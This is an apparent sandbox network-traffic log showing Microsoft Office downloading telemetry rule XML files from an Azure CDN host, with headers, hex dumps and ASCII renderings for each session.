                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  77192.168.2.74978313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:55 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:55 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 475
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA740822"
                                                                                                                                                                                  x-ms-request-id: 5c8e7bca-d01e-0049-4f4b-3ce7dc000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185255Z-15b8b599d88m7pn7hC1TEB4axw00000003eg000000004307
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:55 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  78192.168.2.74978413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:56 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:56 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB464F255"
                                                                                                                                                                                  x-ms-request-id: 9a5c0c24-501e-0064-106e-3c1f54000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185256Z-174c587ffdfgcs66hC1TEB69cs000000038g000000003m4c
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  79192.168.2.74979413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:58 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:58 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 474
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                  x-ms-request-id: 3aa21312-901e-0016-730f-3defe9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185258Z-178bfbc474b9fdhphC1NYCac0n00000004pg00000000mprr
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:58 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  80192.168.2.74979713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:58 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:58 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 405
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                  x-ms-request-id: 964846c7-701e-001e-36c3-3bf5e6000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185258Z-15b8b599d882l6clhC1TEBxd5c000000036g00000000bkh4
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:58 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  81192.168.2.74979513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:58 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                  x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185258Z-174c587ffdfn4nhwhC1TEB2nbc00000003c000000000ewzu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  82192.168.2.74979613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:58 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:58 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B984BF177"
                                                                                                                                                                                  x-ms-request-id: 00c17fdd-701e-000d-2f70-3c6de3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185258Z-174c587ffdfn4nhwhC1TEB2nbc00000003e0000000008nky
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  83192.168.2.74980013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:52:58 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:52:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:52:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                  x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185259Z-178bfbc474bw8bwphC1NYC38b400000004q000000000awhk
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:52:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  84192.168.2.74980413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:00 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 174
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                  x-ms-request-id: c1df62f0-301e-0099-5a1b-3d6683000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185301Z-178bfbc474bxkclvhC1NYC69g400000004u0000000009k8m
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:01 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  85192.168.2.74980813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:01 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 501
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                  ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                  x-ms-request-id: b5a95b30-c01e-002b-0632-3c6e00000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185301Z-178bfbc474btrnf9hC1NYCb80g000000050g00000000au9p
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:01 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  86192.168.2.74980713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:01 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 958
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                  x-ms-request-id: 28a3992e-001e-0028-777f-3bc49f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185301Z-174c587ffdfmlsmvhC1TEBvyks00000003kg000000001f5t
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:01 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
